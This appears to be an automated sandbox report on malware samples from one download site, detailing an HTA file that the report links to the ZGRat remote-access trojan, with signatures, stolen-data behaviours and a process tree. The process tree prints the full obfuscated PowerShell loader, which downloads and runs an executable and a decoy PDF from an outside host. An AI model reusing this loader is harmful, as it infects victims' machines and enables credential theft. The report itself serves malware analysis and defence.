Overview
overview
10Static
static
3magic.pois...lk.dat
windows10-2004-x64
3magic.pois...ed.exe
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10magic.pois...cs.hta
windows10-2004-x64
10magic.pois...nt.pdf
windows10-2004-x64
1magic.pois...zg.wav
windows10-2004-x64
6magic.pois...pt.exe
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10magic.pois...es.hta
windows10-2004-x64
10magic.pois...im.vdf
windows10-2004-x64
3magic.pois...ck.wav
windows10-2004-x64
1magic.pois...ff.dat
windows10-2004-x64
3magic.pois...IB.pdf
windows10-2004-x64
1magic.pois...pt.exe
windows10-2004-x64
10magic.pois...ty.wav
windows10-2004-x64
1magic.pois...ye.wav
windows10-2004-x64
6magic.pois...er.exe
windows10-2004-x64
10magic.pois...vw.mp4
windows10-2004-x64
6magic.pois...op.mp4
windows10-2004-x64
6magic.pois...ed.hta
windows10-2004-x64
10magic.pois...ng.exe
windows10-2004-x64
10magic.pois...wn.png
windows10-2004-x64
3magic.pois...ox.hta
windows10-2004-x64
10magic.pois...xw.exe
windows10-2004-x64
10magic.pois...xw.hta
windows10-2004-x64
10magic.pois...pt.exe
windows10-2004-x64
10Analysis
-
max time kernel
156s -
max time network
174s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
magic.poisontoolz.com/Avjteuhlk.dat
Resource
win10v2004-20231215-en
Behavioral task
behavioral2
Sample
magic.poisontoolz.com/Binded.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
magic.poisontoolz.com/Buildcrypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
magic.poisontoolz.com/Docs.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
magic.poisontoolz.com/Document.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral6
Sample
magic.poisontoolz.com/Evllmzg.wav
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
magic.poisontoolz.com/File1crypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral8
Sample
magic.poisontoolz.com/File2crypt.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
magic.poisontoolz.com/Files.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral10
Sample
magic.poisontoolz.com/Jafxaspdhim.vdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral11
Sample
magic.poisontoolz.com/Otcck.wav
Resource
win10v2004-20231222-en
Behavioral task
behavioral12
Sample
magic.poisontoolz.com/Pphucxdmff.dat
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
magic.poisontoolz.com/RIB.pdf
Resource
win10v2004-20231215-en
Behavioral task
behavioral14
Sample
magic.poisontoolz.com/RagCrypt.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral15
Sample
magic.poisontoolz.com/Spaufgty.wav
Resource
win10v2004-20231222-en
Behavioral task
behavioral16
Sample
magic.poisontoolz.com/Utsxokye.wav
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
magic.poisontoolz.com/Walter.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral18
Sample
magic.poisontoolz.com/Wjwxkhbvw.mp4
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
magic.poisontoolz.com/Wlkubkwdmop.mp4
Resource
win10v2004-20231215-en
Behavioral task
behavioral20
Sample
magic.poisontoolz.com/binded.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral21
Sample
magic.poisontoolz.com/building.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral22
Sample
magic.poisontoolz.com/down.png
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
magic.poisontoolz.com/fox.hta
Resource
win10v2004-20231215-en
Behavioral task
behavioral24
Sample
magic.poisontoolz.com/xw.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral25
Sample
magic.poisontoolz.com/xw.hta
Resource
win10v2004-20231215-en
General
-
Target
magic.poisontoolz.com/fox.hta
-
Size
13KB
-
MD5
2d4c16415e96b123166fb5791f589a74
-
SHA1
c7d04a986c3382cddb58b17f06dd372c66100e6c
-
SHA256
87c90c1f78c42da7be295cbd0ae9523d975753f65e0e8e7ef5f63ee38da43454
-
SHA512
7091e2fa62697a038e7ab8a80298df6922d54e8cd1a9f51d22c33e02d3fafbdaad312645eede17c6d7c5177bec4cae97a3c40aeb7b619d8dcc4b59f09d312012
-
SSDEEP
384:9FQ1lDQfQnqQ1yySMyEFo08QkuVTHTAWX4HRXz6:/Q1lDQfQnqQ1yySMyEFo08QkuVTHTAWB
Malware Config
Signatures
-
Detect ZGRat V1 34 IoCs
Processes:
resource yara_rule behavioral23/memory/4080-46-0x0000000006360000-0x000000000648A000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-47-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-52-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-54-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-50-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-58-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-66-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-72-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-78-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-90-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-96-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-100-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-102-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-104-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-108-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-110-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-106-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-98-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-94-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-92-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-88-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-86-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-84-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-80-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-76-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-74-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-70-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-68-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-64-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-62-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-60-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-56-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/4080-48-0x0000000006360000-0x0000000006483000-memory.dmp family_zgrat_v1 behavioral23/memory/3416-9799-0x00000000054E0000-0x0000000005616000-memory.dmp family_zgrat_v1 -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 20 1868 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 7 IoCs
Processes:
yagacrypt.exeyagacrypt.exeLegalBlockSizes.exeLegalBlockSizes.exeLegalBlockSizes.exeggiac.exeggiac.exepid process 4080 yagacrypt.exe 556 yagacrypt.exe 3152 LegalBlockSizes.exe 3648 LegalBlockSizes.exe 1592 LegalBlockSizes.exe 3416 ggiac.exe 3460 ggiac.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 82 ip-api.com -
Suspicious use of SetThreadContext 5 IoCs
Processes:
yagacrypt.exeLegalBlockSizes.exeLegalBlockSizes.exeInstallUtil.exeggiac.exedescription pid process target process PID 4080 set thread context of 556 4080 yagacrypt.exe yagacrypt.exe PID 3152 set thread context of 1592 3152 LegalBlockSizes.exe LegalBlockSizes.exe PID 1592 set thread context of 1092 1592 LegalBlockSizes.exe InstallUtil.exe PID 1092 set thread context of 1708 1092 InstallUtil.exe InstallUtil.exe PID 3416 set thread context of 3460 3416 ggiac.exe ggiac.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
Processes:
powershell.exeAcroRd32.exepowershell.exeLegalBlockSizes.exeLegalBlockSizes.exepowershell.exepid process 1868 powershell.exe 1868 powershell.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 392 powershell.exe 392 powershell.exe 392 powershell.exe 3152 LegalBlockSizes.exe 3152 LegalBlockSizes.exe 1592 LegalBlockSizes.exe 1592 LegalBlockSizes.exe 2784 powershell.exe 2784 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
powershell.exeyagacrypt.exeyagacrypt.exepowershell.exeLegalBlockSizes.exeLegalBlockSizes.exeInstallUtil.exepowershell.exeInstallUtil.exeggiac.exeggiac.exedescription pid process Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 4080 yagacrypt.exe Token: SeDebugPrivilege 556 yagacrypt.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 3152 LegalBlockSizes.exe Token: SeDebugPrivilege 1592 LegalBlockSizes.exe Token: SeDebugPrivilege 1092 InstallUtil.exe Token: SeDebugPrivilege 2784 powershell.exe Token: SeDebugPrivilege 1708 InstallUtil.exe Token: SeDebugPrivilege 3416 ggiac.exe Token: SeDebugPrivilege 3460 ggiac.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 2996 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid process 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe 2996 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mshta.exepowershell.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 1748 wrote to memory of 1868 1748 mshta.exe powershell.exe PID 1748 wrote to memory of 1868 1748 mshta.exe powershell.exe PID 1748 wrote to memory of 1868 1748 mshta.exe powershell.exe PID 1868 wrote to memory of 2996 1868 powershell.exe AcroRd32.exe PID 1868 wrote to memory of 2996 1868 powershell.exe AcroRd32.exe PID 1868 wrote to memory of 2996 1868 powershell.exe AcroRd32.exe PID 1868 wrote to memory of 4080 1868 powershell.exe yagacrypt.exe PID 1868 wrote to memory of 4080 1868 powershell.exe yagacrypt.exe PID 1868 wrote to memory of 4080 1868 powershell.exe yagacrypt.exe PID 2996 wrote to memory of 2116 2996 AcroRd32.exe RdrCEF.exe PID 2996 wrote to memory of 2116 2996 AcroRd32.exe RdrCEF.exe PID 2996 wrote to memory of 2116 2996 AcroRd32.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 692 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe PID 2116 wrote to memory of 3208 2116 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hPhLUO($gYYfVUqro, $TDHCoMacW){[IO.File]::WriteAllBytes($gYYfVUqro, $TDHCoMacW)};function OuyjBhDPrdGwPbLI($gYYfVUqro){if($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38832,38840,38840))) -eq $True){rundll32.exe $gYYfVUqro }elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38844,38847,38781))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gYYfVUqro}elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38841,38847,38837))) -eq $True){misexec /qn /i $gYYfVUqro}else{Start-Process $gYYfVUqro}};function wZPwXqcGcNksDcvtMGB($uyaYBkDZCCSyzJDelsei){$iFRLJMGtgESMZFs = New-Object (bGYiXoWxyxIAMYfHnL @(38810,38833,38848,38778,38819,38833,38830,38799,38840,38837,38833,38842,38848));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$TDHCoMacW = $iFRLJMGtgESMZFs.DownloadData($uyaYBkDZCCSyzJDelsei);return $TDHCoMacW};function bGYiXoWxyxIAMYfHnL($NWBOMT){$RZDKPliAxJ=38732;$BhXTohPOo=$Null;foreach($eKsxkGZtQqIkdSPR in $NWBOMT){$BhXTohPOo+=[char]($eKsxkGZtQqIkdSPR-$RZDKPliAxJ)};return $BhXTohPOo};function gNBuaXtjuReBmDfHma(){$hIYbSEpsSJoZXPH = $env:AppData + '\';$YQPfBhOhZMdWRyHeqKPdf = $hIYbSEpsSJoZXPH + 'RIB.pdf';If(Test-Path -Path $YQPfBhOhZMdWRyHeqKPdf){Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;}Else{ $arPZzcSlEyncTeAIE = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38814,38805,38798,38778,38844,38832,38834));hPhLUO $YQPfBhOhZMdWRyHeqKPdf $arPZzcSlEyncTeAIE;Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;};$RYunDk = $hIYbSEpsSJoZXPH + 'yagacrypt.exe'; if (Test-Path -Path $RYunDk){OuyjBhDPrdGwPbLI $RYunDk;}Else{ $ehQGZXVzn = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38853,38829,38835,38829,38831,38846,38853,38844,38848,38778,38833,38852,38833));hPhLUO $RYunDk $ehQGZXVzn;OuyjBhDPrdGwPbLI $RYunDk;};;;;}gNBuaXtjuReBmDfHma;2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RIB.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C7AA00897205B0621305857D4844299 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:692
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4E8D65E53F52C2E793C436F7B299ADBD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4E8D65E53F52C2E793C436F7B299ADBD --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:15⤵PID:3208
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:15⤵PID:3448
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=52B0186A564DE3CD6194553D4ACAB064 --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2128
-
